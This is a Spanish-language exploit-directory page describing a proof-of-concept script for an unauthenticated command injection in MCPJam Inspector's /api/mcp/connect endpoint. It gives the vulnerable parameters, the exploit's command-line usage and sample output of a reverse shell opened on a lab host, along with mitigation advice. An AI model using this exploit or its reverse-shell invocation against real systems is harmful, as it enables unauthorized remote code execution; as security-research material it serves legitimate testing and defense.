Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-23744-PoC — CVE-2026-23744 es una inyección de comandos no autenticada en MCPJam Inspector ≤1.4.2 a través de /api/mcp/connect. Este POC lo explota enviando una carga útil JSON manipulada para ejecutar comandos arbitrarios, otorgando una reverse shell con PTY. | Kitploit
Herramientas/GitHubGitHub/mluex0/cve-2026-23744-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmluex0/cve-2026-23744-poc

CVE-2026-23744-PoC

CVE-2026-23744 es una inyección de comandos no autenticada en MCPJam Inspector ≤1.4.2 a través de /api/mcp/connect. Este POC lo explota enviando una carga útil JSON manipulada para ejecutar comandos arbitrarios, otorgando una reverse shell con PTY.

Ver Repositorio
2hace 29 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-23744-PoC

Descargo de responsabilidad:

Esta prueba de concepto se proporciona exclusivamente para investigación de seguridad autorizada, fines educativos y entornos de laboratorio controlados (p. ej., HTB, CTF o pruebas de penetración internas con consentimiento explícito por escrito). El uso no autorizado contra cualquier sistema sin permiso es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso; los usuarios son los únicos responsables de cumplir con todas las leyes y regulaciones aplicables.


Descripción

CVE-2026-23744 es una vulnerabilidad de inyección de comandos no autenticada en MCPJam Inspector (versión ≤ 1.4.2).
El endpoint /api/mcp/connect acepta un payload JSON con serverConfig.command y serverConfig.args y los pasa directamente a un spawn de proceso del sistema sin ninguna sanitización. Un atacante puede enviar una solicitud manipulada para ejecutar comandos arbitrarios del sistema, obteniendo una shell inversa con los privilegios del usuario del servicio.

Este repositorio contiene un script de exploit completamente funcional con un listener interactivo automático opcional basado en PTY (habilitado por defecto).


Requisitos

  • Python 3.6+
  • Librería requests (pip install requests)

Uso

Importante: Proporcione solo el nombre de host o la IP. El script añade automáticamente http:// o https://

root@kitploit:~
python3 exploit.py -t <target> -l <your_ip> [-r <port>] [--ssl] [--check-only]
OpciónDescripción
-t, --targetNombre de host o IP de destino (obligatorio)
-p, --portPuerto de destino (por defecto: 6274)
-l, --lhostTu IP para la shell inversa (obligatorio)
-r, --lportTu puerto de listener (por defecto: 4444)
--sslUsar HTTPS en lugar de HTTP
--check-onlySolo comprobar la vulnerabilidad, no enviar la shell

Ejemplo

El script inicia su propio listener y te proporciona una shell directamente en tu terminal.

root@kitploit:~
python3 exploit.py -t <example_hostname> -l <your_IP> -r <Listener_Port>

Prueba de Concepto (Ejecución Exitosa)

root@kitploit:~
$ python3 exploit.py -t devhub.htb -l 10.10.14.111 -r 4444
[*] Target URL: http://devhub.htb:6274/api/mcp/connect
[*] Checking target...
[+] Target responded with 400 – appears vulnerable
[*] Sending exploit payload...
[+] ReadTimeout – shell likely spawned!
[*] Payload sent. Check your listener!

# On your listener:
connect to [10.10.14.111] from (UNKNOWN) [10.129.245.216] 54150
mcp-dev@devhub:/opt/mcpjam$ id
uid=1001(mcp-dev) gid=1001(mcp-dev) groups=1001(mcp-dev)

Mitigación

  • Sanitizar todos los argumentos suministrados por el usuario que se pasan a funciones de lanzamiento de procesos.
  • No permitir la ejecución arbitraria de comandos a través de endpoints de API sin una lista blanca estricta y autenticación.
  • Ejecutar los servicios con los menores privilegios — nunca como root.

Licencia

Este repositorio es solo para fines educativos y de pruebas autorizadas. Úselo bajo su propio riesgo.

Autor: Mluex0
Fecha: agosto de 2026

Descargar herramienta